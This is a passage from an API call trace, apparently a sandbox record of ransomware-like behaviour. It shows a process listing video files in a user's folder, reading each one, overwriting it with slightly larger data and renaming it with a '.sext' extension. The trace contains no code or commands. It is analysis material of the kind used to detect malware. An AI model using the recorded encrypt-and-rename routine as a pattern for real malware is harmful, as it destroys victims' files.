HALPmcxz\\Videos\\9ipY\\kMyC.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\kmyc.mkv"), fInfoLevelId=0x0, lpFileInformation=0x12e630 | out: lpFileInformation=0x12e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd763b10, ftCreationTime.dwHighDateTime=0x1d5dbe7, ftLastAccessTime.dwLowDateTime=0x7008a50, ftLastAccessTime.dwHighDateTime=0x1d5e002, ftLastWriteTime.dwLowDateTime=0x89d379a0, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x16a10)) returned 1 [0099.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e510) returned 1 [0099.843] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\kMyC.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\kmyc.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\kMyC.mkv.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\kmyc.mkv.sext")) returned 1 [0099.844] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\NE-be6HdLUpf4N04.swf", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\NE-be6HdLUpf4N04.swf", lpFilePart=0x0) returned 0x3e [0099.844] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e450) returned 1 [0099.844] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\NE-be6HdLUpf4N04.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\ne-be6hdlupf4n04.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0099.844] GetFileType (hFile=0x2e4) returned 0x1 [0099.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e3c0) returned 1 [0099.856] GetFileType (hFile=0x2e4) returned 0x1 [0099.856] GetFileSize (in: hFile=0x2e4, lpFileSizeHigh=0x12e5e8 | out: lpFileSizeHigh=0x12e5e8*=0x0) returned 0x1310a [0099.857] ReadFile (in: hFile=0x2e4, lpBuffer=0x22c7620, nNumberOfBytesToRead=0x1310a, lpNumberOfBytesRead=0x12e518, lpOverlapped=0x0 | out: lpBuffer=0x22c7620*, lpNumberOfBytesRead=0x12e518*=0x1310a, lpOverlapped=0x0) returned 1 [0099.858] CloseHandle (hObject=0x2e4) returned 1 [0100.032] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\NE-be6HdLUpf4N04.swf", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\NE-be6HdLUpf4N04.swf", lpFilePart=0x0) returned 0x3e [0100.033] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e450) returned 1 [0100.033] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\NE-be6HdLUpf4N04.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\ne-be6hdlupf4n04.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0100.034] GetFileType (hFile=0x2e4) returned 0x1 [0100.035] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e3c0) returned 1 [0100.035] GetFileType (hFile=0x2e4) returned 0x1 [0100.035] WriteFile (in: hFile=0x2e4, lpBuffer=0x23ec128*, nNumberOfBytesToWrite=0x13110, lpNumberOfBytesWritten=0x12e578, lpOverlapped=0x0 | out: lpBuffer=0x23ec128*, lpNumberOfBytesWritten=0x12e578*=0x13110, lpOverlapped=0x0) returned 1 [0100.037] CloseHandle (hObject=0x2e4) returned 1 [0100.040] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\NE-be6HdLUpf4N04.swf", nBufferLength=0x105, lpBuffer=0x12e110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\NE-be6HdLUpf4N04.swf", lpFilePart=0x0) returned 0x3e [0100.041] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\NE-be6HdLUpf4N04.swf.sext", nBufferLength=0x105, lpBuffer=0x12e110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\NE-be6HdLUpf4N04.swf.sext", lpFilePart=0x0) returned 0x43 [0100.041] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e550) returned 1 [0100.041] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\NE-be6HdLUpf4N04.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\ne-be6hdlupf4n04.swf"), fInfoLevelId=0x0, lpFileInformation=0x12e630 | out: lpFileInformation=0x12e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa07d06c0, ftCreationTime.dwHighDateTime=0x1d5e3e2, ftLastAccessTime.dwLowDateTime=0x4e999fc0, ftLastAccessTime.dwHighDateTime=0x1d5e32a, ftLastWriteTime.dwLowDateTime=0x89f26b80, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x13110)) returned 1 [0100.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e510) returned 1 [0100.041] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\NE-be6HdLUpf4N04.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\ne-be6hdlupf4n04.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\NE-be6HdLUpf4N04.swf.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\ne-be6hdlupf4n04.swf.sext")) returned 1 [0100.042] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e520) returned 1 [0100.042] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO", nBufferLength=0x105, lpBuffer=0x12e010, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO", lpFilePart=0x0) returned 0x3a [0100.042] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\", nBufferLength=0x105, lpBuffer=0x12dfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\", lpFilePart=0x0) returned 0x3b [0100.042] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\*", lpFindFileData=0x12e1c0 | out: lpFindFileData=0x12e1c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93aec150, ftCreationTime.dwHighDateTime=0x1d5d98c, ftLastAccessTime.dwLowDateTime=0xfdce7020, ftLastAccessTime.dwHighDateTime=0x1d5defb, ftLastWriteTime.dwLowDateTime=0xfdce7020, ftLastWriteTime.dwHighDateTime=0x1d5defb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xae39b0 [0100.042] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e210 | out: lpFindFileData=0x12e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93aec150, ftCreationTime.dwHighDateTime=0x1d5d98c, ftLastAccessTime.dwLowDateTime=0xfdce7020, ftLastAccessTime.dwHighDateTime=0x1d5defb, ftLastWriteTime.dwLowDateTime=0xfdce7020, ftLastWriteTime.dwHighDateTime=0x1d5defb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.043] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e210 | out: lpFindFileData=0x12e210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda2bd280, ftCreationTime.dwHighDateTime=0x1d5e161, ftLastAccessTime.dwLowDateTime=0xcab20910, ftLastAccessTime.dwHighDateTime=0x1d5dd82, ftLastWriteTime.dwLowDateTime=0xcab20910, ftLastWriteTime.dwHighDateTime=0x1d5dd82, nFileSizeHigh=0x0, nFileSizeLow=0x175fd, dwReserved0=0x0, dwReserved1=0x0, cFileName="c_UY.flv", cAlternateFileName="")) returned 1 [0100.043] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e210 | out: lpFindFileData=0x12e210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x432d8840, ftCreationTime.dwHighDateTime=0x1d5e16d, ftLastAccessTime.dwLowDateTime=0xc1ed3880, ftLastAccessTime.dwHighDateTime=0x1d5e012, ftLastWriteTime.dwLowDateTime=0xc1ed3880, ftLastWriteTime.dwHighDateTime=0x1d5e012, nFileSizeHigh=0x0, nFileSizeLow=0x15f28, dwReserved0=0x0, dwReserved1=0x0, cFileName="DaO3.avi", cAlternateFileName="")) returned 1 [0100.043] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e210 | out: lpFindFileData=0x12e210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0797800, ftCreationTime.dwHighDateTime=0x1d5e3f4, ftLastAccessTime.dwLowDateTime=0xb676bf30, ftLastAccessTime.dwHighDateTime=0x1d5e7b5, ftLastWriteTime.dwLowDateTime=0xb676bf30, ftLastWriteTime.dwHighDateTime=0x1d5e7b5, nFileSizeHigh=0x0, nFileSizeLow=0xee81, dwReserved0=0x0, dwReserved1=0x0, cFileName="DbuW7 AVRfVZ4Mwz.avi", cAlternateFileName="DBUW7A~1.AVI")) returned 1 [0100.043] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e210 | out: lpFindFileData=0x12e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf15ef450, ftCreationTime.dwHighDateTime=0x1d5e7b0, ftLastAccessTime.dwLowDateTime=0xbeaeb960, ftLastAccessTime.dwHighDateTime=0x1d5dc6f, ftLastWriteTime.dwLowDateTime=0xbeaeb960, ftLastWriteTime.dwHighDateTime=0x1d5dc6f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ETQ7i", cAlternateFileName="")) returned 1 [0100.043] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e210 | out: lpFindFileData=0x12e210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51580be0, ftCreationTime.dwHighDateTime=0x1d5e6ed, ftLastAccessTime.dwLowDateTime=0x39ee5b30, ftLastAccessTime.dwHighDateTime=0x1d5d9c3, ftLastWriteTime.dwLowDateTime=0x39ee5b30, ftLastWriteTime.dwHighDateTime=0x1d5d9c3, nFileSizeHigh=0x0, nFileSizeLow=0x6d95, dwReserved0=0x0, dwReserved1=0x0, cFileName="llL2AYEdzakX1Dxgfa.swf", cAlternateFileName="LLL2AY~1.SWF")) returned 1 [0100.043] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e210 | out: lpFindFileData=0x12e210*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0100.044] FindClose (in: hFindFile=0xae39b0 | out: hFindFile=0xae39b0) returned 1 [0100.044] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e470) returned 1 [0100.044] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e430) returned 1 [0100.044] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e520) returned 1 [0100.044] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO", nBufferLength=0x105, lpBuffer=0x12e010, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO", lpFilePart=0x0) returned 0x3a [0100.044] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\", nBufferLength=0x105, lpBuffer=0x12dfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\", lpFilePart=0x0) returned 0x3b [0100.044] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\*", lpFindFileData=0x12e1c0 | out: lpFindFileData=0x12e1c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93aec150, ftCreationTime.dwHighDateTime=0x1d5d98c, ftLastAccessTime.dwLowDateTime=0xfdce7020, ftLastAccessTime.dwHighDateTime=0x1d5defb, ftLastWriteTime.dwLowDateTime=0xfdce7020, ftLastWriteTime.dwHighDateTime=0x1d5defb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xae39b0 [0100.044] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e210 | out: lpFindFileData=0x12e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93aec150, ftCreationTime.dwHighDateTime=0x1d5d98c, ftLastAccessTime.dwLowDateTime=0xfdce7020, ftLastAccessTime.dwHighDateTime=0x1d5defb, ftLastWriteTime.dwLowDateTime=0xfdce7020, ftLastWriteTime.dwHighDateTime=0x1d5defb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.045] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e210 | out: lpFindFileData=0x12e210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda2bd280, ftCreationTime.dwHighDateTime=0x1d5e161, ftLastAccessTime.dwLowDateTime=0xcab20910, ftLastAccessTime.dwHighDateTime=0x1d5dd82, ftLastWriteTime.dwLowDateTime=0xcab20910, ftLastWriteTime.dwHighDateTime=0x1d5dd82, nFileSizeHigh=0x0, nFileSizeLow=0x175fd, dwReserved0=0x0, dwReserved1=0x0, cFileName="c_UY.flv", cAlternateFileName="")) returned 1 [0100.045] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e210 | out: lpFindFileData=0x12e210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x432d8840, ftCreationTime.dwHighDateTime=0x1d5e16d, ftLastAccessTime.dwLowDateTime=0xc1ed3880, ftLastAccessTime.dwHighDateTime=0x1d5e012, ftLastWriteTime.dwLowDateTime=0xc1ed3880, ftLastWriteTime.dwHighDateTime=0x1d5e012, nFileSizeHigh=0x0, nFileSizeLow=0x15f28, dwReserved0=0x0, dwReserved1=0x0, cFileName="DaO3.avi", cAlternateFileName="")) returned 1 [0100.045] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e210 | out: lpFindFileData=0x12e210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0797800, ftCreationTime.dwHighDateTime=0x1d5e3f4, ftLastAccessTime.dwLowDateTime=0xb676bf30, ftLastAccessTime.dwHighDateTime=0x1d5e7b5, ftLastWriteTime.dwLowDateTime=0xb676bf30, ftLastWriteTime.dwHighDateTime=0x1d5e7b5, nFileSizeHigh=0x0, nFileSizeLow=0xee81, dwReserved0=0x0, dwReserved1=0x0, cFileName="DbuW7 AVRfVZ4Mwz.avi", cAlternateFileName="DBUW7A~1.AVI")) returned 1 [0100.045] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e210 | out: lpFindFileData=0x12e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf15ef450, ftCreationTime.dwHighDateTime=0x1d5e7b0, ftLastAccessTime.dwLowDateTime=0xbeaeb960, ftLastAccessTime.dwHighDateTime=0x1d5dc6f, ftLastWriteTime.dwLowDateTime=0xbeaeb960, ftLastWriteTime.dwHighDateTime=0x1d5dc6f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ETQ7i", cAlternateFileName="")) returned 1 [0100.046] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e210 | out: lpFindFileData=0x12e210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51580be0, ftCreationTime.dwHighDateTime=0x1d5e6ed, ftLastAccessTime.dwLowDateTime=0x39ee5b30, ftLastAccessTime.dwHighDateTime=0x1d5d9c3, ftLastWriteTime.dwLowDateTime=0x39ee5b30, ftLastWriteTime.dwHighDateTime=0x1d5d9c3, nFileSizeHigh=0x0, nFileSizeLow=0x6d95, dwReserved0=0x0, dwReserved1=0x0, cFileName="llL2AYEdzakX1Dxgfa.swf", cAlternateFileName="LLL2AY~1.SWF")) returned 1 [0100.046] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e210 | out: lpFindFileData=0x12e210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51580be0, ftCreationTime.dwHighDateTime=0x1d5e6ed, ftLastAccessTime.dwLowDateTime=0x39ee5b30, ftLastAccessTime.dwHighDateTime=0x1d5d9c3, ftLastWriteTime.dwLowDateTime=0x39ee5b30, ftLastWriteTime.dwHighDateTime=0x1d5d9c3, nFileSizeHigh=0x0, nFileSizeLow=0x6d95, dwReserved0=0x0, dwReserved1=0x0, cFileName="llL2AYEdzakX1Dxgfa.swf", cAlternateFileName="LLL2AY~1.SWF")) returned 0 [0100.046] FindClose (in: hFindFile=0xae39b0 | out: hFindFile=0xae39b0) returned 1 [0100.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e470) returned 1 [0100.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e430) returned 1 [0100.046] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\c_UY.flv", nBufferLength=0x105, lpBuffer=0x12de80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\c_UY.flv", lpFilePart=0x0) returned 0x43 [0100.046] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e360) returned 1 [0100.046] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\c_UY.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\c_uy.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0100.046] GetFileType (hFile=0x2e4) returned 0x1 [0100.047] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e2d0) returned 1 [0100.047] GetFileType (hFile=0x2e4) returned 0x1 [0100.047] GetFileSize (in: hFile=0x2e4, lpFileSizeHigh=0x12e4f8 | out: lpFileSizeHigh=0x12e4f8*=0x0) returned 0x175fd [0100.047] ReadFile (in: hFile=0x2e4, lpBuffer=0x1240d118, nNumberOfBytesToRead=0x175fd, lpNumberOfBytesRead=0x12e428, lpOverlapped=0x0 | out: lpBuffer=0x1240d118*, lpNumberOfBytesRead=0x12e428*=0x175fd, lpOverlapped=0x0) returned 1 [0100.050] CloseHandle (hObject=0x2e4) returned 1 [0102.183] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\c_UY.flv", nBufferLength=0x105, lpBuffer=0x12de80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\c_UY.flv", lpFilePart=0x0) returned 0x43 [0102.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e360) returned 1 [0102.184] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\c_UY.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\c_uy.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0102.186] GetFileType (hFile=0x2e4) returned 0x1 [0102.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e2d0) returned 1 [0102.186] GetFileType (hFile=0x2e4) returned 0x1 [0102.186] WriteFile (in: hFile=0x2e4, lpBuffer=0x12481fb8*, nNumberOfBytesToWrite=0x17600, lpNumberOfBytesWritten=0x12e488, lpOverlapped=0x0 | out: lpBuffer=0x12481fb8*, lpNumberOfBytesWritten=0x12e488*=0x17600, lpOverlapped=0x0) returned 1 [0102.190] CloseHandle (hObject=0x2e4) returned 1 [0102.200] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\c_UY.flv", nBufferLength=0x105, lpBuffer=0x12e020, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\c_UY.flv", lpFilePart=0x0) returned 0x43 [0102.200] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\c_UY.flv.sext", nBufferLength=0x105, lpBuffer=0x12e020, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\c_UY.flv.sext", lpFilePart=0x0) returned 0x48 [0102.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e460) returned 1 [0102.201] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\c_UY.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\c_uy.flv"), fInfoLevelId=0x0, lpFileInformation=0x12e540 | out: lpFileInformation=0x12e540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda2bd280, ftCreationTime.dwHighDateTime=0x1d5e161, ftLastAccessTime.dwLowDateTime=0xcab20910, ftLastAccessTime.dwHighDateTime=0x1d5dd82, ftLastWriteTime.dwLowDateTime=0x8b3887e0, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x17600)) returned 1 [0102.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e420) returned 1 [0102.201] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\c_UY.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\c_uy.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\c_UY.flv.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\c_uy.flv.sext")) returned 1 [0102.202] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DaO3.avi", nBufferLength=0x105, lpBuffer=0x12de80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DaO3.avi", lpFilePart=0x0) returned 0x43 [0102.202] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e360) returned 1 [0102.202] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DaO3.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\dao3.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0102.203] GetFileType (hFile=0x2e4) returned 0x1 [0102.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e2d0) returned 1 [0102.203] GetFileType (hFile=0x2e4) returned 0x1 [0102.203] GetFileSize (in: hFile=0x2e4, lpFileSizeHigh=0x12e4f8 | out: lpFileSizeHigh=0x12e4f8*=0x0) returned 0x15f28 [0102.203] ReadFile (in: hFile=0x2e4, lpBuffer=0x124995f0, nNumberOfBytesToRead=0x15f28, lpNumberOfBytesRead=0x12e428, lpOverlapped=0x0 | out: lpBuffer=0x124995f0*, lpNumberOfBytesRead=0x12e428*=0x15f28, lpOverlapped=0x0) returned 1 [0102.208] CloseHandle (hObject=0x2e4) returned 1 [0102.346] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DaO3.avi", nBufferLength=0x105, lpBuffer=0x12de80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DaO3.avi", lpFilePart=0x0) returned 0x43 [0102.346] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e360) returned 1 [0102.346] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DaO3.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\dao3.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0102.348] GetFileType (hFile=0x2e4) returned 0x1 [0102.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e2d0) returned 1 [0102.348] GetFileType (hFile=0x2e4) returned 0x1 [0102.348] WriteFile (in: hFile=0x2e4, lpBuffer=0x12507278*, nNumberOfBytesToWrite=0x15f30, lpNumberOfBytesWritten=0x12e488, lpOverlapped=0x0 | out: lpBuffer=0x12507278*, lpNumberOfBytesWritten=0x12e488*=0x15f30, lpOverlapped=0x0) returned 1 [0102.351] CloseHandle (hObject=0x2e4) returned 1 [0102.369] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DaO3.avi", nBufferLength=0x105, lpBuffer=0x12e020, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DaO3.avi", lpFilePart=0x0) returned 0x43 [0102.369] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DaO3.avi.sext", nBufferLength=0x105, lpBuffer=0x12e020, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DaO3.avi.sext", lpFilePart=0x0) returned 0x48 [0102.369] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e460) returned 1 [0102.370] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\DaO3.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\dao3.avi"), fInfoLevelId=0x0, lpFileInformation=0x12e540 | out: lpFileInformation=0x12e540*(dwFileAttributes=0x20, 